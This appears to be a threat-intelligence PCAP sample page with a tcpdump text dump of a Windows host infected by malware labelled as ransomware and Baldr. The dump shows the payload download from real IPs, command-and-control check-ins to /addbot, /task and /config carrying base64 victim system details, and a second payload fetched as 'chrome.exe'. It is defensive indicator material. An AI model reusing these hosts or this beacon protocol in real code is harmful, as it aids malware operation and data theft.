
New Ransomware Variant POST /addbot? 51.255.203.164 95.81.0.83 PCAP Download Traffic Sample

Download Attachments

  • 1 pcap 1baldr
    Date added: May 22, 2019 5:33 am Added by: admin File size: 14 MB Downloads: 28

2019-05-21 22:33:27.228144 IP 10.1.10.162.53173 > 95.81.0.83.80: Flags [P.], seq 1:538, ack 1, win 16425, length 537: HTTP: GET /baldr/1baldr.exe HTTP/1.1
E..A`.@…#.
.
._Q.S…P……..P.@).M..GET /baldr/1baldr.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=115032-
Unless-Modified-Since: Tue, 14 May 2019 17:00:02 GMT
If-Range: "bf600-588dbf6c43571"
Host: 95.81.0.83
Connection: Keep-Alive

2019-05-21 22:37:04.849374 IP 10.1.10.162.53175 > 51.255.203.164.80: Flags [P.], seq 1:530, ack 1, win 16425, length 529: HTTP: POST /bundles/sensiodistribution/webconfigurator/bild.exe HTTP/1.1
E..9bM@….+
.
.3……P..<Y..n.P.@)`D..POST /bundles/sensiodistribution/webconfigurator/bild.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 51.255.203.164
Connection: Keep-Alive
Cache-Control: no-cache


.
.3……P..>j..o.P.?………..
2019-05-21 22:37:05.152308 IP 95.81.1.51.80 > 10.1.10.162.53176: Flags [S.], seq 1042536569, ack 1776458428, win 29200, options [mss 1410,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.1..}_Q.3
.
..P..>#.yi…..r……………..
2019-05-21 22:37:05.152555 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [.], ack 1, win 16567, length 0
E..(bP@…#Y
.
._Q.3…Pi…>#.zP.@………..
2019-05-21 22:37:05.152721 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [P.], seq 1:482, ack 1, win 16567, length 481: HTTP: POST /suicide HTTP/1.1
E.. bQ@…!w
.
._Q.3…Pi…>#.zP.@.d…POST /suicide HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


..P..>#.zi…P…6…HTTP/1.1 200 OK
Date: Wed, 22 May 2019 02:37:05 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

ZmFsc2U=

2019-05-21 22:37:05.359519 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [P.], seq 482:962, ack 213, win 16514, length 480: HTTP: POST /config HTTP/1.1
E…bS@…!v
.
._Q.3…Pi…>#.NP.@.7…POST /config HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

2019-05-21 22:37:08.535915 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 482:962, ack 213, win 16514, length 480: HTTP: POST /config HTTP/1.1
E…b^@…!k
.
._Q.3…Pl……fP.@.L…POST /config HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


Content-Length: 4
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

0100
2019-05-21 22:37:08.932325 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [.], ack 419, win 16463, length 0
E..(b_@…#J
.
.Q.3…Pl..…4P.@O……….
2019-05-21 22:37:09.155121 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 962:1742, ack 419, win 16463, length 780: HTTP: POST /addbot?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&bit=eDY0&win=V2luZG93cyA3IFByb2Zlc3Npb25hbA==&cpu=SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIEU1NTQwICBAIDIuNTNHSHoA&gpu=U3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXI=&av=VW5rbm93bg==&filename=d2lubG9nb24uZXhl&username=cnk0d24= HTTP/1.1
E..4b`@… =
.
.Q.3…Pl..…4P.@OO…POST /addbot?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&bit=eDY0&win=V2luZG93cyA3IFByb2Zlc3Npb25hbA==&cpu=SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIEU1NTQwICBAIDIuNTNHSHoA&gpu=U3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXI=&av=VW5rbm93bg==&filename=d2lubG9nb24uZXhl&username=cnk0d24= HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
User-Agent: Megumin/2.0
Host: 95.81.1.51
Connection: Keep-Alive

2019-05-21 22:37:09.923721 IP 10.1.10.162.53179 > 95.81.1.51.80: Flags [P.], seq 1:484, ack 1, win 16567, length 483: HTTP: POST /blacklist HTTP/1.1
E…bd@…!b
.
._Q.3…P..zB..’.P.@…..POST /blacklist HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

2019-05-21 22:37:09.923733 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 2225:2757, ack 829, win 16360, length 532: HTTP: POST /task?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm HTTP/1.1
E..<be@…!0
.
._Q.3…Pl. N….P.?..h..POST /task?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-21 22:37:10.143233 IP 95.81.1.51.80 > 10.1.10.162.53178: Flags [.], ack 2757, win 282, length 0
E .(..@.1. ._Q.3
.
..P……l.”bP…V………
2019-05-21 22:37:10.149580 IP 10.1.10.162.53179 > 95.81.1.51.80: Flags [P.], seq 484:961, ack 205, win 16516, length 477: HTTP: POST /cpu HTTP/1.1
E…bf@…!f
.
._Q.3…P..|%..(.P.@…..POST /cpu HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

2019-05-21 22:37:10.477779 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [P.], seq 1:488, ack 1, win 16425, length 487: HTTP: POST /chrome.exe HTTP/1.1
E…bm@…..
.
….K…P…u2..&P.@)….POST /chrome.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 31.204.154.75
Connection: Keep-Alive
Cache-Control: no-cache


.
….K…P…\2..6P………….
2019-05-21 22:37:11.429668 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [.], ack 684741, win 55253, length 0
E..(c.@…..
.
….K…P…\2…P…y………
2019-05-21 22:37:11.429737 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [.], ack 684741, win 65335, length 0
E..(c.@…..
.
….K…P…\2…P..7Q………
2019-05-21 22:37:11.431998 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 2757:3306, ack 1093, win 16294, length 549: HTTP: POST /completed?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&taskId=MTE= HTTP/1.1
E..Mc.@… .
.
._Q.3…Pl.”b….P.?..Q..POST /completed?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&taskId=MTE= HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache
